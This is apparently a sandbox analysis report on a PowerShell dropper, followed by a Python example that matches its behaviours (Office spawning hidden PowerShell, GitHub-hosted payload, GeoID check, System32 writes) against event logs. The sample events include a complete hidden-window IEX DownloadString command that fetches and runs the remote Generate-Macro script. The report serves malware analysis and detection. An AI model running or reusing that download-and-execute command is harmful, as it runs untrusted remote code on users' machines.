
General

  • Target

    e1fd15634a2886d0ac9574f1c462c895e374a5f8b8a88321a6242abed400f111

  • Size

    44KB

  • Sample

    240708-2enr1svcle

  • MD5

    c75e74d9a3c2057a5f53f4eed1fd7d52

  • SHA1

    06279205c38c809a596bc25c3ebade01a1aaf55f

  • SHA256

    e1fd15634a2886d0ac9574f1c462c895e374a5f8b8a88321a6242abed400f111

  • SHA512

    a8b8ea46df6bf43bda2d23b4943b8732cc69f6404c839649570c42004a919fe668a19760bb4ea363b7e023f291a1c358f4041b0ca1c3868632444e563166382b

  • SSDEEP

    768:Ctvo+rzZk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJxSjWRJFlmQQc82J9acM9acyL:qZk3hbdlylKsgqopeJBWhZFGkE+cL2Nc

Malware Config

Extracted

  • Language

    ps1

  • Source

    ps1.dropper

  • URLs

    https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Targets

    • Target

      e1fd15634a2886d0ac9574f1c462c895e374a5f8b8a88321a6242abed400f111

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with the display window hidden (e.g. -WindowStyle Hidden), so the user sees no console.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check to avoid running in certain regions.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
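The signature list above describes behaviours, not detection logic. The following is an added example (not part of the Triage report and not code from the sample or from the Generate-Macro project) showing how the same behaviours can be matched against process, network, registry and file events such as those a Sysmon or EDR sensor emits. The event schema, the hosting-domain list, the hidden-window regex and the registry path used for the country/GeoID lookup are all assumptions of this example; the report does not quote Triage's rules. The sample events are constructed here and mirror the report: an Office parent spawning PowerShell with a hidden window, a download from the raw.githubusercontent.com URL in the extracted config, a GeoID registry read and a file write under System32.

```python
import re
from dataclasses import dataclass

# Parents that should not normally spawn a scripting host (assumed list)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Legitimate hosting services often abused for payload staging (assumed list)
LEGIT_HOSTING = {"raw.githubusercontent.com", "github.com", "pastebin.com", "discord.com"}

# "-w hidden", "-win h", "-WindowStyle Hidden": -w is the only powershell.exe
# switch starting with w, so any -w* prefix followed by h/hidden is accepted.
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I)
# Assumed registry location of the configured country (GeoID); the report does
# not state which key Triage's "Checks computer location settings" rule watches.
GEO_KEY = re.compile(r"control panel\\international\\geo", re.I)
SYSTEM32 = re.compile(r"^c:\\windows\\system32\\", re.I)


@dataclass
class Event:
    kind: str            # "process", "network", "registry" or "file"
    image: str           # image name of the acting process
    parent: str = ""     # parent image (process events only)
    cmdline: str = ""    # command line (process events only)
    target: str = ""     # remote host, registry path or file path


def score(events):
    """Return the sorted, de-duplicated set of signature names the events trigger."""
    hits = set()
    for e in events:
        img = e.image.lower()
        if e.kind == "process":
            if e.parent.lower() in OFFICE_PARENTS and img in SCRIPT_HOSTS:
                hits.add("Process spawned unexpected child process")
            if img in {"powershell.exe", "pwsh.exe"} and HIDDEN_WINDOW.search(e.cmdline):
                hits.add("Command and Scripting Interpreter: PowerShell")
        elif e.kind == "network" and img in SCRIPT_HOSTS:
            hits.add("Blocklisted process makes network request")
            if e.target.lower() in LEGIT_HOSTING:
                hits.add("Legitimate hosting services abused for malware hosting/C2")
        elif e.kind == "registry" and GEO_KEY.search(e.target):
            hits.add("Checks computer location settings")
        elif e.kind == "file" and SYSTEM32.match(e.target):
            hits.add("Drops file in System32 directory")
    return sorted(hits)


# Constructed events mirroring the report; the dropped-file path is invented.
DROPPER_URL = "https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1"
SAMPLE_EVENTS = [
    Event("process", "powershell.exe", parent="winword.exe",
          cmdline=f"powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('{DROPPER_URL}')\""),
    Event("network", "powershell.exe", target="raw.githubusercontent.com"),
    Event("registry", "powershell.exe", target=r"HKCU\Control Panel\International\Geo\Nation"),
    Event("file", "powershell.exe", target=r"C:\Windows\System32\Tasks\update.job"),
]

# Constructed benign activity: an admin launching PowerShell from Explorer.
BENIGN_EVENTS = [
    Event("process", "powershell.exe", parent="explorer.exe", cmdline="powershell.exe -NoProfile"),
    Event("registry", "powershell.exe", target=r"HKCU\Software\Microsoft\PowerShell\1\ShellIds"),
]

if __name__ == "__main__":
    for name, evs in (("sample", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        print(name, score(evs))
```

Running the block prints all six signature names for the constructed sample events and an empty list for the benign ones. The hidden-window and unexpected-child rules are the two that carry most of the weight in practice; a PowerShell child of WINWORD.EXE with -w hidden is worth alerting on even before any network or registry activity is seen.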
